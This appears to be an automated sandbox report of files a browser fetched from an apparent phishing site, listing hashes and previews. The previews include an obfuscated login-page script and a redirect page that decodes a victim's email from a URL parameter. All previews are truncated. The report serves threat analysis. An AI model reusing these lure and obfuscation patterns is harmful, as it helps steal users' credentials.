                                                Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                Category:downloaded
                                                Size (bytes):43596
                                                Entropy (8bit):7.9952701440723475
                                                Encrypted:true
                                                SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/89Lx2AXVud2xlUwbPNlje12zdhl4A2IPyz79
                                                Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):231
                                                Entropy (8bit):6.725074433303473
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                MD5:547988BAC5584B4608466D761E16F370
                                                SHA1:C11BB71049702528402A31027F200184910A7E23
                                                SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130
                                                Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):2905
                                                Entropy (8bit):3.962263100945339
                                                Encrypted:false
                                                SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                MD5:FE87496CC7A44412F7893A72099C120A
                                                SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                Malicious:false
                                                Reputation:low
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):7390
                                                Entropy (8bit):4.02755241095864
                                                Encrypted:false
                                                SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169
                                                Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                Category:downloaded
                                                Size (bytes):109447
                                                Entropy (8bit):5.202931520634447
                                                Encrypted:false
                                                SSDEEP:1536:4iw5DZ5Mp2uCTtRJtG5DYg5MPV5DRAQDg5MmGHNVX01TV2:4iwxrrpQGH3X0v2
                                                MD5:6FA824258E75FC1AA9FE70E01F42C103
                                                SHA1:D300AE28C77583E3C987994189874FF678C13581
                                                SHA-256:EE735A7D85B57253E54CA248BF2B2856BCFC03F5D2043AC86DFCF90E404601EE
                                                SHA-512:E72004FC9A3AFD7D5A1B620A3580E57D0EEBCA03A2270A54C5C749924E58746B0823EBF06AE10E91B3FF0DC929530535DB429C1A0E0C18E7EB0BDBCEC29C7FFD
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/34HEkFr4q1WYO5T8k73FNznYijhCiUxn12JK89110
                                                Preview:const _0x146162=_0x487c;(function(_0x4db690,_0xbf335f){const _0x32316e=_0x487c,_0x317f2a=_0x4db690();while(!![]){try{const _0x39212f=parseInt(_0x32316e(0x14e))/0x1*(-parseInt(_0x32316e(0x1f0))/0x2)+parseInt(_0x32316e(0xa5))/0x3+-parseInt(_0x32316e(0xf3))/0x4+-parseInt(_0x32316e(0xb3))/0x5+-parseInt(_0x32316e(0xaf))/0x6+parseInt(_0x32316e(0x123))/0x7*(parseInt(_0x32316e(0x19d))/0x8)+parseInt(_0x32316e(0xdf))/0x9;if(_0x39212f===_0xbf335f)break;else _0x317f2a['push'](_0x317f2a['shift']());}catch(_0x14f974){_0x317f2a['push'](_0x317f2a['shift']());}}}(_0x1559,0xdef7b));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x146162(0xbb)]('sections')[_0x146162(0xb2)][_0x146162(0x19e)](_0x146162(0x127))&&(view=_0x146162(0xb9));document['getElementById'](_0x146162(0x208))&&!document[_0x146162(0xbb)](_0x146162(0x208))[_0x146162(0xb2)][_0x146162(0x19e)](_0x146162(0x127))&&(view=_0x146162(0xc2));document[_0x146162(0x12e)]('keyup',function(_0x2e5733){const _0x5eece2
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):2905
                                                Entropy (8bit):3.962263100945339
                                                Encrypted:false
                                                SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                MD5:FE87496CC7A44412F7893A72099C120A
                                                SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/yzOnhObGr29YVTEpoKHxwCt0Ttl0TsRXrtnmnc8YXG0k8Gp4YhObKRadM5FYz8Eab180
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (736)
                                                Category:downloaded
                                                Size (bytes):536322
                                                Entropy (8bit):5.6798144668160075
                                                Encrypted:false
                                                SSDEEP:6144:IOJw/WFc9V1bUk/S8PdjYMvnqWKYoaoVpCv+drkERM+jtGKOGInix2ZBZPY:IDX/b/S8PvvnqWKYrEe+aeoLw
                                                MD5:82EB347FF9829DE451400D8B672DF1EF
                                                SHA1:D7419D4CCB8696BB2A90519A4E2B916D64D7D537
                                                SHA-256:44EC88FCA0B915A741F9EFCF5EF13D40133CB7E6501AA18D56490532C83ADC95
                                                SHA-512:6FFA79EC2F3B2941B72050C72307933C39C0C7A56A970CE9C90C2D5AAC21609274B833A790B1235217995151700274732EA18CB87C0C7969235304052A4CF380
                                                Malicious:false
                                                Reputation:low
                                                URL:https://www.gstatic.com/recaptcha/releases/DH3nyJMamEclyfe-nztbfV8S/recaptcha__en.js
                                                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):29796
                                                Entropy (8bit):7.980058333789969
                                                Encrypted:false
                                                SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                MD5:210433A8774859368F3A7B86D125A2A7
                                                SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                Category:downloaded
                                                Size (bytes):28584
                                                Entropy (8bit):7.992563951996154
                                                Encrypted:true
                                                SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                MD5:17081510F3A6F2F619EC8C6F244523C7
                                                SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/78cJa7D3fK45ClNib8mst60
                                                Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (1437), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):38221
                                                Entropy (8bit):5.115226983536052
                                                Encrypted:false
                                                SSDEEP:192:loogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjf7ogxp:2DKAaZtJs5odw7hx5P6mqjDggJkLLn
                                                MD5:FBE2FCF4596B299453C91B7231BA7427
                                                SHA1:743291EE60A551E043529AFDC9E3FBE72D70E776
                                                SHA-256:2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
                                                SHA-512:15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/abD8xmKpqXe3def25
                                                Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):1141
                                                Entropy (8bit):4.793017350873927
                                                Encrypted:false
                                                SSDEEP:24:OPRC0r93KwiQiVNs3JWAUQG0lURse5mBMCz:onr9m9F/sUmaCz
                                                MD5:86481A42BFB2F2C978DFC4AF8B9F17BB
                                                SHA1:3E1BB8EBAA18092340F06C2A12C945C8689B11BA
                                                SHA-256:6411DFAA2A634A142BD81D11092B39B32C6D2D33DD0ADBEA2A4253BBC7B8B7A2
                                                SHA-512:61306C6C53EFCE3C5D59212E0350A1104CE67A8FF8AF1E30828AF05C5D0C9D717A8EA4245ED6FBD6FD8286E41DC3BDD90D24E272D61B398CA24A0A144B9761E6
                                                Malicious:false
                                                Reputation:low
                                                URL:https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475
                                                Preview:..<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>File loading</title>.. <script>.. // Function to get the value of a parameter from the URL.. function getParameterByName(name, url) {.. if (!url) url = window.location.href;.. name = name.replace(/[\[\]]/g, "\\$&");.. var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),.. results = regex.exec(url);.. if (!results) return null;.. if (!results[2]) return '';.. return decodeURIComponent(results[2].replace(/\+/g, " "));.. }.. var base64EmailParam = getParameterByName('email');.. function decodeEmail(base64Email) {.. return atob(base64Email);.. }.. if (base64EmailParam) {.. var email = decodeEmail(base64EmailParam);.. setTimeout(function () {.. win
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                Category:downloaded
                                                Size (bytes):35970
                                                Entropy (8bit):7.989503040923577
                                                Encrypted:false
                                                SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/yzSSueW3Rlb568gKDHxKxop43
                                                Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):49602
                                                Entropy (8bit):7.881935507115631
                                                Encrypted:false
                                                SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                MD5:DB783743CD246FF4D77F4A3694285989
                                                SHA1:B9466716904457641B7831868B47162D8D378D41
                                                SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207
                                                Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):3.990210155325004
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):70712
                                                Entropy (8bit):6.94130504124589
                                                Encrypted:false
                                                SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                MD5:F70FF06D19498D80B130EC78176FD3FF
                                                SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                Malicious:false
                                                Reputation:low
